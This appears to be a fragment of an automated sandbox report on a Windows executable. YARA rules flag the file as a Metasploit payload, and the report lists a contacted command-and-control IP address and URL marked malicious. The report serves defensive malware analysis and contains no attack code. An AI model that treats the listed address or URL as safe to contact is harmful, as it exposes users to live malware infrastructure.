Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Remote Access Functionality
barindex
Yara detected Metasploit Payload
Source: Yara match File source: DRVf7H9j4V.exe, type: SAMPLE
Source: Yara match File source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520612 Sample: DRVf7H9j4V.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 10 Found malware configuration 2->10 12 Malicious sample detected (through community Yara rule) 2->12 14 Antivirus / Scanner detection for submitted sample 2->14 16 6 other signatures 2->16 5 DRVf7H9j4V.exe 2->5         started        process3 dnsIp4 8 89.197.154.115, 49704, 49705, 49706 VIRTUAL1GB United Kingdom 5->8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.197.154.115
 unknown United Kingdom
47474 VIRTUAL1GB true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF true
    		unknown